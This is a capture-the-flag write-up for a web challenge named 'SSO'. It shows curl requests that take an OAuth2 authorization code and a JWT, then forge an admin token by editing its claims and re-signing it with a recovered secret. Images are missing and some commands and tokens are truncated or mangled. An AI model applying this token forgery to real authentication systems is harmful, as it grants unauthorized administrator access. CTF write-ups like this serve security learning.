SSO - Web

Don’t you love undocumented APIs Be the admin you were always meant to be

In this challenge, we have a webpage that got this information in the source code

<h1>Welcome to our SINGLE SIGN ON PAGE WITH FULL OAUTH2.0!</h1>
<a href="/protected">.</a>
Wish we had an automatic GET route for /authorize... well they'll just have to POST from their own clients I guess
POST /oauth2/token
POST /oauth2/authorize form-data TODO: make a form for this route

Here we have to exploit the OAuth2.0 protocol. After reading the documentation, we need to have some specific parameters in our request. The first request we make is this one

curl -d “response_type=code&redirect_uri=xxxx”

This will make a request to /authorize which will give us the auth code. The response we get is the following:

Redirecting to <a href="xxxx?code=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyZWRpcmVjdF91cmkiOiJ4eHh4IiwiaWF0IjoxNTM3MDQyNDI3LCJleHAiOjE1MzcwNDMwMjd9.wlUbFkuep3-tf_QNersLq_wa4nnsJ6aBVXa208MDdfE&amp;state=">xxxx?code=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyZWRpcmVjdF91cmkiOiJ4eHh4IiwiaWF0IjoxNTM3MDQy> NDI3LCJleHAiOjE1MzcwNDMwMjd9.wlUbFkuep3-tf_QNersLq_wa4nnsJ6aBVXa208MDdfE&amp;state=</a>.

Then once you have the auth code, you send a request to /token to get the token:

curl -X POST -d “grant_type=authorization_code&code=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyZWRpcmVjdF91cmkiOiJ4eHh4IiwiaWF0IjoxNTM3MDQyNDI3LCJleHAi>OjE1MzcwNDMwMjd9.wlUbFkuep3-tf_QNersLq_wa4nnsJ6aBVXa208MDdfE&redirect_uri=xxxx”

The grant_type parameter comes from the documentation which is required when you make a request to /token. After running that, we get our token


This is a JWT web token so we can go to and change the type from user to admin so it looks like this:


The last step we need to do on the page is to the sign the cookie with the secret “ufoundme!”:


Then the page updates the new token which we use to send a request to /protected since we now have an admin cookie. Therfore, the final requests that gave us the flag is the following:

curl -H “Authorization: Bearer eyJhbGciOiJIUzI.eyJ0eXBlIjoiYWRtaW4iLCJzZWNyZXQiOiJ1Zm91bmRtZSEiLCJpYXQiOjE1MzcwNDI0NjcsImV4cCI6MTUzNzA0MzA2N30.eIbd4h>ZyU3J_jF7aXCT5JpJKDbVzjHB_coq1DFgw-8Q”